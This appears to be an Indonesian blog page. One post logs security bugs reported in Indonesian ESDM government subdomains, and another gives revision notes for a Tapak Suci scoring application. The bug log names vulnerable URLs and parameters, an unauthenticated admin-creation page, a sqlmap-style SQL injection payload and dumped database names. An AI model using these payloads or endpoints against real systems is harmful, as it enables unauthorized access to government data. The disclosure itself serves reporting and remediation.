Wednesday, December 19, 2018

BUGS http://inspektur.djk.esdm.go.id

DOMAIN : http://inspektur.djk.esdm.go.id
BUGS :  Session Pages
RISK : HIGH

PUBLIK DAPAT MENGAKSES PAGES :
http://inspektur.djk.esdm.go.id/user/import
http://inspektur.djk.esdm.go.id/user/create

Publik dapat membuat user baru (setingkat Administrator) melalui tautan :
http://inspektur.djk.esdm.go.id/user/create

Status Terkini : Telah diperbaiki

Bugs http://www.vsi.esdm.go.id

Domain : http://www.vsi.esdm.go.id/cctv/
BUGS : SQL INJECTION
RISK : HIGH
Target : http://www.vsi.esdm.go.id/cctv/detail_cctv.php?id=2
Parameter : id


available databases [11]:
[*] `admin-sys`
[*] cctv_db
[*] esdm_website
[*] gallery
[*] gallerycvghm
[*] gallerypvmbg0916
[*] information_schema
[*] joomlacks
[*] mysql
[*] performance_schema
[*] phpmyadmin

Dilaporkan pada tanggal 5 September 2018
Status Terkini: Telah diperbaiki

Bugs http://faq.esdm.go.id

DOMAIN : http://faq.esdm.go.id
BUGS : SQL Injection
RISK : HIGH

Target : http://faq.esdm.go.id/backup/login/checkuser
POST Parameter : user & password

---
Telah dilaporkan pada tanggal 28 November 2018.
Status Terkini: Telah diperbaiki.

Bugs http://ppsdmmigas.esdm.go.id/sertifikasi/

DOMAIN : http://ppsdmmigas.esdm.go.id/sertifikasi/
BUGS : SQL Injection
DATE : 15 Desember 2018
LEVEL : High Risk

POST parameter 'kategori' is vulnerable.

Parameter: kategori (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: kategori=(SELECT (CASE WHEN (6253=6253) THEN 6253 ELSE 6253*(SELECT 6253 FROM INFORMATION_SCHEMA.PLUGINS) END))&keyword=admin

---

available databases [9]:
[*] dimigas
[*] dimigas_javan
[*] dmigas_javan_bak
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] sertifikasi
[*] smscenter
[*] wordpress

---
Sudah dilaporkan pada tanggal 15 Desember 2018.




Tuesday, October 2, 2018

Aplikasi Digital Scoring Tapak Suci REVISI 2

Daftar perbaikan aplikasi digital scoring Tapak Suci REVISI 2 :
  • Layout Tampilan Scoring
  • Penambahan Field "Babak" pada table jadwal_tanding
  • Sortir "no partai" pada halaman login wasit juri
  • Penambahan kolom "babak","skor", dan "pemenang" pada cetak jadwal tanding
  • Penambahan fitur edit pada jadwal tanding
  • Penambahan modul entri jadwal tanding per-partai
  • Penambahan modul Manajemen Perolehan Medali Kelas Tanding (Via menu Home)

Disebabkan ada penambahan field "babak" pada Tabel jadwal_tanding dan adanya penambahan Tabel medali pada database, maka database yang digunakan pada versi ini tidak dapat menggunakan database versi sebelumnya. Untuk itu silakan, IMPORT file tapaksuciDB.sql yang terletak pada folder install.

PANDUAN :
Video Tutorial klik di sini.
Buku Panduan (Size A5) klik di sini.

Aplikasi yang dibutuhkan (versi windows) :
- Aplikasi XAMPP versi 5.6.36
- Text Editor Sublime